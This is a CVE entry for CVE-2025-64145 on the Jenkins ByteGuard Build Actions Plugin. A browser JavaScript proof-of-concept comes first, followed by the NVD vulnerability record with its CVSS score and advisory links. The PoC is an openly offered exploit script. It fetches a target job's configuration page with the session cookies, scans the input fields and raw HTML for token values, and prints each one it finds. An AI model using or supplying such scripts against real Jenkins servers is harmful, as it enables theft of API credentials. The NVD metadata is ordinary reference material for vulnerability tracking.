CVE-2025-64145

// CVE-2025-64145 PoC - Information Disclosure via Unmasked API Token // This PoC demonstrates how to extract unmasked API tokens from Jenkins ByteGuard Plugin // Step 1: Access the job configuration page const jobName = 'your-target-job'; const configUrl = `${jenkinsUrl}/job/${jobName}/configure`; // Step 2: Fetch the configuration page fetch(configUrl, { method: 'GET', credentials: 'include' // Include session cookies for authentication }) .then(response => response.text()) .then(html => { // Step 3: Parse the HTML to find unmasked API tokens const parser = new DOMParser(); const doc = parser.parseFromString(html, 'text/html'); // Look for input fields containing 'token' or 'api' in name/ID const inputs = doc.querySelectorAll('input[type="text"], input[type="password"]'); inputs.forEach(input => { const name = input.name || input.id || ''; const type = input.type; // Check if this is a ByteGuard API token field if (name.toLowerCase().includes('token') || name.toLowerCase().includes('api') || name.toLowerCase().includes('byteguard')) { // If type is 'text' instead of 'password', token is unmasked if (type === 'text') { console.log('[!] Unmasked token found!'); console.log('Field name:', name); console.log('Token value:', input.value); } } }); // Alternative: Search in raw HTML for visible token values const tokenPattern = /name=["'][^"']*token[^"']*["'][^>]*value=["']([^"']+)["']/gi; let match; while ((match = tokenPattern.exec(html)) !== null) { console.log('[!] Token found in HTML:', match[1]); } }); // Note: This PoC requires a valid Jenkins session with Job/Configure permission

{"cve": {"id": "CVE-2025-64145", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:59.300", "lastModified": "2025-11-04T22:16:41.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins ByteGuard Build Actions Plugin 1.0 does not mask API tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:byteguard_build_actions:1.0:*:*:*:*:jenkins:*:*", "matchCriteriaId": "68BCABA0-96C0-4433-AA7A-A0377572DADA"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3560", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}